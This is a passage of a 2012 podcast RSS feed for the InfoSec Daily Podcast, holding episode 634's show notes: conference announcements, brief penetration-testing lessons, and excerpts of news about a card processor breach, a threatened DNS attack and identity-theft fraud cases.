		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 634 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-634-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-634-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 01 Apr 2012 04:11:29 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3715</guid>
		<description><![CDATA[Episode 634 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 634 for March 31, 2012. Tonight&#39;s podcast is hosted by Dr. Bonez. Guests: aricon, oncee, and spridel Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; [...]]]></description>
			<content:encoded><![CDATA[<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Episode 634 &#8211; Weekend Wrap-up with Dr. b0n3z</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 634 for March 31, 2012. </span><span style="font-size: 13px;font-family: Verdana;vertical-align: baseline">Tonight&#39;s podcast is hosted by Dr. Bonez.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Guests: aricon, oncee, and spridel</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Outerz0ne 8<br class="kix-line-break" /><br />
	<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: April 20-21, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	<br />
	</span><a href="http://www.outerz0ne.org/"><span>http://www.outerz0ne.org</span></a><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	<br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">AIDE 2012<br class="kix-line-break" /><br />
	<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012<br class="kix-line-break" /><br />
	<br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	<br />
	</span><a href="http://www.appyide.org/"><span>http://www.appyide.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">LayerOne 2012<br class="kix-line-break" /><br />
	<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	<br />
	</span><a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span> <br class="kix-line-break" /><br />
	<br />
	</span><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Social Engineering Training</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Black Hat Vegas</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012<br class="kix-line-break" /><br />
	<br />
	Where: &nbsp;Bristol, UK</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	<br />
	Where: &nbsp;Columbia, MD</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/certified-training/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	<br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	<br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	<br />
	</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	<br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	<br />
	</span><a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Skydogcon</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"><br class="kix-line-break" /><br />
	<br />
	When: October 26-28<br class="kix-line-break" /><br />
	<br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	<br />
	</span><a href="http://www.skydogcon.com/"><span>http://www.skydogcon.com</span></a><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;text-decoration: underline;vertical-align: baseline">Pentest Lessons:</span></b></p>
<ol style="margin-top: 0pt;margin-bottom: 0pt">
<li>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="vertical-align: baseline">Pentest != (run vulnerability scanner of choice, load into Metasploit, autopwn) &#8230; And yes I know that autopwn has been completely removed from the MSF trunk <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </span></b></p>
</li>
<li>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="vertical-align: baseline">When making social engineering pretexting calls, you should know the full names, geographic locations, and NATIVE LANGUAGES of the targets.</span></b></p>
</li>
<li>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="vertical-align: baseline">If you setup a &quot;special&quot; website for a phishing exercise, shut down the website once the exercise is finished.</span></b></p>
</li>
<li>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="vertical-align: baseline">No matter how good you think you are, NEVER tell a customer that you will find ALL of their vulnerabilities or ALL of the &quot;ways in&quot;.</span></b></p>
</li>
</ol>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><a href="http://pentest-standard.org/"><span>http://pentest-standard.org </span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;text-decoration: underline;vertical-align: baseline">Stories</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://swizec.com/blog/why-programmers-work-at-night/swizec/3198"><span>http://swizec.com/blog/why-programmers-work-at-night/swizec/3198</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">A popular saying goes that Programmers are machines that turn caffeine into code. &nbsp;And sure enough, ask a random programmer when they do their best work and there&rsquo;s a high chance they will admit to a lot of late nights. Some earlier, some later. A popular trend is to get up at 4am and get some work done before the day&rsquo;s craziness begins. Others like going to bed at 4am.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">At the gist of all this is avoiding distractions. But you could just lock the door, what&rsquo;s so special about the night?</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">I think it boils down to three things: the maker&rsquo;s schedule, the sleepy brain and bright computer screens.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">: </span><a href="http://www.infosecisland.com/blogview/20863-Visa-and-MasterCard-Alert-Banks-of-Massive-Processor-Breach.html"><span>http://www.infosecisland.com/blogview/20863-Visa-and-MasterCard-Alert-Banks-of-Massive-Processor-Breach.html</span></a></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Reports are surfacing that credit card issuers Visa and MasterCard are warning banks of a massive breach at an undisclosed payments processor.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">According to Brian Krebs, the breach occurred sometime between between Jan. 21, 2012 and Feb. 25, 2012 and may involve somewhere in the neighborhood of 10 million compromised card numbers.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Krebs reports that Visa issued the following statement in response to his initial coverage of the breaking news story&quot;</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;font-style: italic;vertical-align: baseline">&quot;Visa Inc. is aware of a potential data compromise incident at a third party entity affecting card account information from all major card brands. There has been no breach of Visa systems, including its core processing network VisaNet.&quot;</span><br />
	<span style="font-size: 13px;font-family: Verdana;font-weight: normal;font-style: italic;vertical-align: baseline">&quot;Visa has provided payment card issuers with the affected account numbers so they can take steps to protect consumers through independent fraud monitoring and, if needed, reissuing cards.&quot;</span><br />
	<span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">: </span><a href="http://isc.sans.org/diary/Tomorrow+the+world+will+end/12868"><span>http://isc.sans.org/diary/Tomorrow+the+world+will+end/12868</span></a></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">No, this isn&#39;t about the Mayan calendar, and that particular instance of &quot;End of the World&quot; is anyway not scheduled to happen until December 21st. (this is non-sense it&rsquo;s just another 5,000 year cycle)</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">This is about March 31st, and the announcement by &quot;Anonymous&quot;, or those who claim to be &quot;Anonymous&quot;, to wipe out the DNS root servers with a Distributed Denial of Service (DDoS) attack on March 31. Cricket Liu, the author of most of the O&#39;Reilly DNS books and an authority on the subject, has posted a good blog entry at http://www.cricketondns.com/post.cfm/could-a-ddos-attack-against-the-roots-succeed, explaining in-depth that while such an attack is theoretically feasible, it is unlikely to succeed at a large scale.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">We&#39;ll have to see. If DNS stops working tomorrow, we at least only have to live without it until December 21st, when the world will end for good anyway <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://cw.com.hk/news/microsoft-co-founder-paul-allen-victim-identity-theft?section=breaking_news"><span>http://cw.com.hk/news/microsoft-co-founder-paul-allen-victim-identity-theft?section=breaking_news</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">An AWOL (absent without leave) US Army soldier based in Pittsburgh is accused of stealing Microsoft co-founder Paul Allen&#39;s identity and using it attempt to steal money from Allen&#39;s Citibank account.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">Court documents unsealed this week in US District Court in Pennsylvania alleged that Brandon Price, 30, of Pittsburgh, impersonated Allen on the phone and convinced a Citibank employee to send him a debit card in Allen&#39;s name and account number.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">Price, who has been absent without leave from the US Army since June 2010, is accused of then attempting to conduct more than $15,000 worth of transactions using the illegally obtained debit card.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">According to court records, Price called Citibank&#39;s customer service on Jan. 9 and managed to change the address on Allen&#39;s account from Seattle, Wash. to an address on Station Street, in Pittsburgh. He also added a new phone number to the account on the same day.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">On Jan 12, Price, representing himself as Allen, called Citibank again, this time to say that he had misplaced his debit card but didn&#39;t want to report it as stolen. Price allegedly convinced the bank to send him a replacement debit card via UPS to the Pittsburgh address.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">Price received the card a day later, activated it by phone immediately and used it to successfully make a payment of $658.81 against a delinquent loan account in Price&#39;s name at the Armed Forces Bank in Fort Leavenworth, Kansas. He then attempted to use the card the same day to make a $15,000 Western Union transaction via the phone.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">A day later, Price is alleged to have used the card for a $278 purchase at a local Gamestop store and a $1 purchase at a Family Dollar store. Video surveillance cameras at both stores caught Price attempting to make those transactions. Price was arrested March 2 and is being held in federal custody on bank fraud and wire fraud related charges. He faces a maximum of 30 years in prison if convicted.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">The complaint against Price alleges that he used a computer in carrying out his theft. However, it&#39;s not immediately clear from the complaint how Price used a computer in carrying out his alleged crimes. It&#39;s also not clear from the court documents how Price obtained the identifying information that he would have needed in order to pass himself off as Allen or to get Citibank to change Allen&#39;s account address and send him a replacement card.</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Georgia;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://online.wsj.com/article/SB10001424052702303404704577309854181227634.html"><span>http://online.wsj.com/article/SB10001424052702303404704577309854181227634.html</span></a></b></p>
<p dir="ltr" style="margin-left: 6pt;margin-right: 6pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Federal authorities are struggling to crack down on what they describe as a widespread scheme that has already likely defrauded the Internal Revenue Service of billions of dollars using the stolen identities of Puerto Rican citizens.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-left: 6pt;margin-right: 6pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">The perpetrators of the scheme, authorities say, swipe the Social Security numbers of Puerto Rican citizens, who don&#39;t have to pay federal income tax&mdash;and are less likely to be on the IRS radar&mdash;and use their information to file fake returns. In some cases, they enlist U.S. mail carriers to intercept the refund checks that are disbursed.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-left: 6pt;margin-right: 6pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">The plot, which includes participants from around the U.S. and Latin America, has been around for at least five years. Prosecutors have obtained multiple convictions but none involving those believed to be among the top players in the operation, according to several people briefed on investigations into the fraud.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-left: 6pt;margin-right: 6pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">&quot;What we have uncovered may very well be the tip of the iceberg,&quot; said Manhattan U.S. Attorney Preet Bharara, whose office was among the first to investigate the group. &quot;It&#39;s a massive fraud.&quot;</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-left: 6pt;margin-right: 6pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Between October 2010 and June 2011, the IRS received phony tax returns based on stolen Puerto Rican identities that would have led to the disbursement of $5.6 billion to alleged fraudsters, two of these people said. It is unclear how much money the IRS ultimately sent but one person familiar with the matter said an estimated $2 billion in checks was distributed.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-634-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3715/0/infosec-daily-podcast-episode-634.mp3" length="17483024" type="audio/mpeg" />
		<itunes:duration>0:36:25</itunes:duration>
		<itunes:subtitle>Episode 634 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 634 for March 31, 2012. Tonight&#39;s podcast is hosted by Dr. Bonez.

	
Guests: aricon, oncee, and spridel

	
Announcements:
Outerz0ne 8
	
	When: April 20-21, 2012
	
	[...]</itunes:subtitle>
		<itunes:summary>Episode 634 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 634 for March 31, 2012. Tonight&#39;s podcast is hosted by Dr. Bonez.

	
Guests: aricon, oncee, and spridel

	
Announcements:
Outerz0ne 8
	
	When: April 20-21, 2012
	
	Where: Wellesley Inn, Atlanta GA
	
	http://www.outerz0ne.org 

	
Linuxfest Northwest 2012
	
	When: Saturday, April 28-29, 2012
	
	Where: Bellingham Technical College &#8211; Bellingham, WA
	
	http://www.linuxfestnorthwest.org/

	
AIDE 2012
	
	When: May 21-25, 2012
	
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	
	http://www.appyide.org/

	
LayerOne 2012
	
	When: May 26-27, 2012
	
	Where: Clarion Hotel &#8211; Anaheim, CA
	
	http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	
	Where: Courtyard Seattle Federal Way, WA 
	
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	
	Where: Black Hat Vegas
When: August 20-24, 2012
	
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	
	Where: &#160;Columbia, MD
http://www.social-engineer.com/certified-training/

	
Inside and Out of the Social-Engineer Toolkit (SET)
	
	When: July 21 &#8211; 22, 2012
	
	When: July 23 &#8211; 24, 2012
	
	Where: Black Hat Vegas
	
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	
	When: &#160;September 27-30, 2012
	
	Where: Louisville, KY
	
	http://www.derbycon.com

	
Skydogcon
	
	When: October 26-28
	
	Where: Hotel Preston in Nashville, TN 
	
	http://www.skydogcon.com 

	
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.

	
You don't have a sufficient version of Flash Player to display this animation.

	
Pentest Lessons:


Pentest != (run vulnerability scanner of choice, load into Metasploit, autopwn) &#8230; And yes I know that autopwn has been completely removed from the MSF trunk  


When making social engineering pretexting calls, you should know the full names, geographic locations, and NATIVE LANGUAGES of the targets.


If you setup a &#34;special&#34; website for a phishing exercise, shut down the website once the exercise is finished.


No matter how good you think you are, NEVER tell a customer that you will find ALL of their vulnerabilities or ALL of the &#34;ways in&#34;.


http://pentest-standard.org 
Stories
Source: http://swizec.com/blog/why-programmers-work-at-night/swizec/3198
A popular saying goes that Programmers are machines that turn caffeine into code. &#160;And sure enough, ask a random programmer when they do their best work and there&#8217;s a high chance they will admit to a lot of late nights. Some earlier, some later. A popular trend is to get up at 4am and get some work done before the day&#8217;s craziness begins. Others like going to bed at 4am.

	
At the gist of all this is avoiding distractions. But you could just lock the door, what&#8217;s so special about the night?

	
I think it boils down to three things: the maker&#8217;s schedule, the sleepy brain and bright computer screens.
&#8230;
Source: http://www.infosecisland.com/blogview/20863-Visa-and-MasterCard-Alert-Banks-of-Massive-Processor-Breach.html
Reports are surfacing that credit card issuers Visa and MasterCard are warning banks of a massive breach at an undisclosed payments processor.
According to Brian Krebs, the breach occurred sometime between between Jan. 21, 2012 and Feb. 25, 2012 and may involve somewhere in the neighborhood of 10 million compromised card numbers.
Krebs reports that Visa issued the following statement in response to his initial coverage of the breaking news story&#34;
&#34;Visa Inc. is aware of a potential da[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 633 &#8211; Global Blackout, Kelihos zombies, Crystal Palace of Code,  Facebook Passwords, and The Limux Project</title>
		<link>http://www.isdpodcast.com/episode-633-global-blackout-kelihos-zombies-crystal-palace-of-code-facebook-passwords-and-the-limux-project</link>
		<comments>http://www.isdpodcast.com/episode-633-global-blackout-kelihos-zombies-crystal-palace-of-code-facebook-passwords-and-the-limux-project#comments</comments>
		<pubDate>Sat, 31 Mar 2012 01:05:01 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3709</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 633 for March 30, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA [...]]]></description>
